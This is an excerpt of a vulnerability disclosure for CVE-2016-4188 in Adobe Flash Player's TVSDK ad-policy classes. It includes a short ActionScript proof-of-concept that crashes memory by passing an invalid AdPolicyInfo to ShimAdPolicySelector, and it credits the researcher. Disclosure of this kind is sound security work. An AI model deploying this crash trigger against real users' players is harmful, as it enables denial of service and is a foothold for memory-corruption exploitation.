II. Description
Normally, selectAdBreaksToPlay() should validate its parameter returns error in AS3 level if anything goes wrong.
However, if ShimAdPolicySelector is constructed with adPolicySelectorType=0, then invoking selectAdBreaksToPlay() with invalid AdPolicyInfo instance, some inner fields of ShimAdPolicySelector will be absent, which will cause a memory crash.
POC Source Code:
package
{
import com.adobe.tvsdk.mediacore.MediaPlayerItem;
import com.adobe.tvsdk.mediacore.timeline.advertising.policy.AdPolicyInfo;
import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;
import flash.display.Sprite;
public class poc extends Sprite
{
public function poc()
{
var mp:MediaPlayerItem;
var ap:AdPolicyInfo;
var obj:ShimAdPolicySelector = new ShimAdPolicySelector(0,mp);
obj.selectAdBreaksToPlay(ap);
}
}
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned as CVE-2016-4188 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-25.html